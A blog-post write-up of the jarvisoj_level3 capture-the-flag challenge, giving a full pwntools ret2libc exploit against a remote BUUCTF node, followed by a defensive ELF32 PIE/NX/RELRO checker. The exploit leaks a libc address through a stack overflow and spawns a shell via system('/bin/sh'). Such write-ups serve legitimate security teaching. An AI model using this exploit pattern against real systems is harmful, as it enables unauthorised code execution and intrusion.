pwn | jarvisoj_level3
x86 ret2libc
A very standard ret2libc.
exp:
from pwn import *
from LibcSearcher.LibcSearcher import *

context.log_level = 'debug'
elf = ELF('./level3')
# libc = ELF('./libc-2.23.so')  # also fine when the remote libc is known; LibcSearcher is used below instead

p_main = 0x08048484             # main(): returning here lets the overflow be triggered a second time
p_plt_write = elf.plt['write']  # PLT stub of write, at a fixed address because the binary is not PIE
p_got_write = elf.got['write']  # GOT entry holding the resolved libc address of write

# p = process('./level3')
p = remote('node4.buuoj.cn', 26805)
p.recvuntil(b'Input:\n')

p_str = 0x08048540  # unused

# leak the address of write
# padding (0x88 buffer + 4 bytes saved ebp) + write@plt + return address (main) + write_arg1 + write_arg2 + write_arg3
# i.e. write(1, &got['write'], 4), then return to main
payload = b'M'*(0x88+4) + p32(p_plt_write) + p32(p_main) + p32(1) + p32(p_got_write) + p32(4)
p.send(payload)
addr = u32(p.recv(4))
print(hex(addr))

# identify the remote libc from the leaked write address and compute its base
libc = LibcSearcher('write', addr)
p_libc_write = libc.dump('write')
p_libc_base = addr - p_libc_write
p_system = p_libc_base + libc.dump('system')
p_binsh = p_libc_base + libc.dump('str_bin_sh')

# second overflow: return into system("/bin/sh"); b'Mz11' is the fake return address of system
p.recvuntil(b'Input:\n')
payload = b'M'*(0x88+4) + p32(p_system) + b'Mz11' + p32(p_binsh)
p.send(payload)
p.interactive()
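Added here as a defender-side check, not part of the original writeup: the script above can hard-code main, write@plt and the write GOT entry only because the binary loads at a fixed address, i.e. it is not PIE. The helper below reads the ELF32 header and program headers with the standard library alone and reports PIE, NX and RELRO; build_elf32 is an assumed helper that fabricates a minimal, constructed ELF32 image for a self-test and is not the challenge binary.

```python
import struct
import sys

# Constants from the ELF specification
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474e551, 0x6474e552
PF_X = 1


def elf32_hardening(data: bytes) -> dict:
    """Report PIE / NX / RELRO for an ELF32 image.

    pie   False means the text segment loads at a fixed address, so PLT, GOT
          and main() addresses can be hard-coded (as in the script above).
    nx    True when PT_GNU_STACK is present without the executable bit.
    relro True when a PT_GNU_RELRO segment exists (partial or full RELRO);
          telling full from partial needs DT_BIND_NOW and is not checked here.
    """
    if data[:4] != b'\x7fELF' or data[4] != 1:  # e_ident[EI_CLASS] == ELFCLASS32
        raise ValueError('not an ELF32 image')
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum (the fields that follow e_ident)
    fields = struct.unpack_from('<HHIIIIIHHH', data, 16)
    e_type, e_phoff, e_phentsize, e_phnum = fields[0], fields[4], fields[8], fields[9]
    nx, relro = False, False  # no PT_GNU_STACK at all historically meant an executable stack
    for i in range(e_phnum):
        phdr = struct.unpack_from('<IIIIIIII', data, e_phoff + i * e_phentsize)
        p_type, p_flags = phdr[0], phdr[6]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {'pie': e_type == ET_DYN, 'nx': nx, 'relro': relro}


def build_elf32(e_type: int, phdrs) -> bytes:
    """Constructed minimal ELF32 image (header + program headers only) for self-tests.
    phdrs is a list of (p_type, p_flags) pairs; this is not the challenge binary."""
    e_ident = b'\x7fELF' + bytes([1, 1, 1, 0]) + bytes(8)  # 32-bit, little-endian, version 1
    header = struct.pack('<HHIIIIIHHHHHH', e_type, 3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    body = b''.join(struct.pack('<IIIIIIII', t, 0, 0, 0, 0, 0, f, 0x10) for t, f in phdrs)
    return e_ident + header + body


if __name__ == '__main__':
    with open(sys.argv[1], 'rb') as f:  # e.g. ./level3
        print(elf32_hardening(f.read()))
```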
This post is from 博客园 (cnblogs), author: Mz1. Please credit the original link when reposting: https://www.cnblogs.com/Mz1-rc/p/16972484.html
Questions can be left in the comments below or sent by email: mzi_mzi@163.com